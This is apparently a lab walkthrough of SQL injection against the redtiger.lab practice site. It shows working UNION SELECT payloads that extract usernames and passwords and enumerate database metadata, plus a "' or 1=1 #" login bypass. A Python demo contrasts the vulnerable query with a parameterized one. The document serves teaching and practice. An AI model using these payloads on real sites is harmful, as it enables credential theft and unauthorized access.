SQL INJECTION (redtiger.lab) - Part 1

SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application sends to its database, thus allowing the attacker to view data that they are not normally able to retrieve. This might be data belonging to the application's users or any other data the application can access. SQL injection can be quite severe: an attacker can modify or delete data in the application's database and may even compromise the underlying server.

Today we will be performing basic SQL injection in the redtiger lab.

Here we will be doing Level 1 and Level 2 for now.

LEVEL 1:

When we choose Level 1 we see the following page.

Now when we click 1, the website sends a GET request.

Now we try to exploit the parameter cat.

Step 1:

Our first step will be to determine the number of columns in the table named level1_users. To make it easy, the table name is provided here, but we can still perform the attack without knowing the table name.

To determine the number of columns we can use either an ORDER BY query or a SELECT query. Here we will be using ORDER BY.

Now let's pass the query in the parameter cat.

Query to pass: cat= 1 order by 4 #

# comments out the remainder of the original query.

When we use a number greater than 4 (5, 6, and so on) the page shows "no category found", and when we use a number less than or equal to 4 it displays the category. From this we learn that there are 4 columns in the table level1_users.

Step 2:

The next step is to determine through which columns we can extract and display information from the table. For this we can use a UNION SELECT query.

Query to be used : cat = 1 union select 1,2,3,4 from level1_users #

If the table name were not given, we could use

cat =1 union select 1,2,3,4 #

The output of the query is shown in the figure above; from it we can see that we can display information using columns 3 and 4.

Step 3:

Now we can extract the username and password from the table using columns 3 and 4.

Query to be passed:

cat = 1 union select 1,2,username,password from level1_users #

Some extra queries that can be used to gain more information about the target (not needed to complete Level 1):

To get the name of the current database we can use database() in the SQL query.
query : cat =1 union select 1,2,database(),4 #

To get the version of the database we use the function version().
query : cat =1 union select 1,2,version(),4 #

To get the current database user we use the function current_user().
query:cat = 1 union select 1,2,current_user(),4 #

To list the table names in the current database we use:
query : cat =1 union select 1,2,table_name,4 from information_schema.tables where table_schema=database() #

LEVEL 2 (A simple login bypass):

When we choose Level 2 we get the following interface.

From the interface we can see that the hint is "condition". So we now try to insert a true statement in both the username and password fields.

username: 1' or 1=1 #

password: 1' or 1=1#

Writing this always-true condition makes the WHERE clause of the login query evaluate to true regardless of the actual username and password, and by this we successfully bypass the authentication.
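To show why the bypass works and how the query is fixed, here is an added Python example (not code from the lab or the original post) that builds the Level 2 login query against a constructed in-memory SQLite table, first by string concatenation as the vulnerable application does, then with bound parameters. Since SQLite does not recognise MySQL's `#` comment marker, the demo payload uses `--` instead; the table and credentials are assumptions.

```python
import sqlite3

# Constructed demo table standing in for the lab's login table (the real
# schema is not shown on the page). Passwords are plain text only to keep
# the demo short; a real application stores a salted hash instead.
USERS = [("admin", "s3cret-example"), ("alice", "wonderland")]


def make_db():
    """Create an in-memory SQLite database holding the constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def vulnerable_login(conn, username, password):
    """The Level 2 bug: user input is spliced straight into the SQL text.
    Returns True when at least one row matches, i.e. the login is accepted."""
    sql = ("SELECT username FROM users WHERE username = '%s' "
           "AND password = '%s'" % (username, password))
    return conn.execute(sql).fetchone() is not None


def safe_login(conn, username, password):
    """Same check with bound parameters: the driver passes the input as data,
    so quotes and comment markers inside it never reach the SQL parser."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# The page's payload is "1' or 1=1 #"; SQLite's line comment is "--", so the
# constructed payload swaps the marker while keeping the same structure.
PAYLOAD = "1' or 1=1 --"

if __name__ == "__main__":
    db = make_db()
    # Concatenated query collapses to: ... WHERE username = '1' or 1=1
    print("concatenated, payload:", vulnerable_login(db, PAYLOAD, PAYLOAD))  # True
    print("parameterized, payload:", safe_login(db, PAYLOAD, PAYLOAD))      # False
    print("parameterized, real creds:", safe_login(db, "admin", "s3cret-example"))  # True
```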

References: